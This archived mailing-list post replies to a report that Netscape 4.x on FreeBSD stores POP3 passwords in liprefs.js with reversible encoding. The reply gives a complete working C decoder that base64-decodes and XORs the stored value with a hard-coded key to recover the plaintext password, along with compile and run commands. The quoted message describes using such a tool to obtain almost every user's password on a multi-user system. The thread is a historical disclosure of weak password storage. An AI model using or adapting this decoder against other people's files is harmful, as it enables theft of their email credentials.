Alexey Pavlov wrote: > I found method how to get users passwords from Netscape 4.5 for > FreeBSD ~user/.netscape/liprefs.js file. This file is used for > storing user last session preferences .This file also contains > encrypted password for pop3. This method has been found months ago. > Not like a DES , this encryption can be decrypted. As a result of > many experiments i wrote this program. It gives me almost all > passwords in my system, because all people use Netscape. > Here is src of this decryption programm: > (snip) Fascinating way to decrypt "xored" password :) Here's my little decoder, that I wrote in April 1998 for Netscape 4.0x. -----cut here----- /* (c) 1998 by wojtek kaniewski (wojtekkaat_private) */ #include <stdio.h> char base64[] = \ "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; char key[] = \ { 86, 201, 239, 74, 155, 190, 90, 66, 119, 2, 67, 24, 112, 48, 139, 76, 176, 42, 214, 79, 149, 141, 250, 247, 87, 123, 152, 9, 67, 93, 1, 10 }; void main(int argc, char **argv) { int d = 0, m = 7, b, i = 0, c; char *p = (argc > 1) ? argv[1] : ""; for (; *p && *p != '='; p++) { for (c = 0; c < 64 && *p != base64[c]; c++); for (b = 5; b > -1; b--, m--) { d |= ((c & (1 << b)) >> b) << m; if (!m) { printf("%c", d ^ key[i++]); d = 0; m = 8; }; } } printf("\n"); } -----cut here----- $ gcc decode.c -o decode $ ./decode <encrypted-password-here> And no, it _won't_ get encrypted password from preferences file for you. -- wojtekkaat_private :: http://wojtekka.stone.pl/ :: ^wojtekka@irc
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:42:00 PDT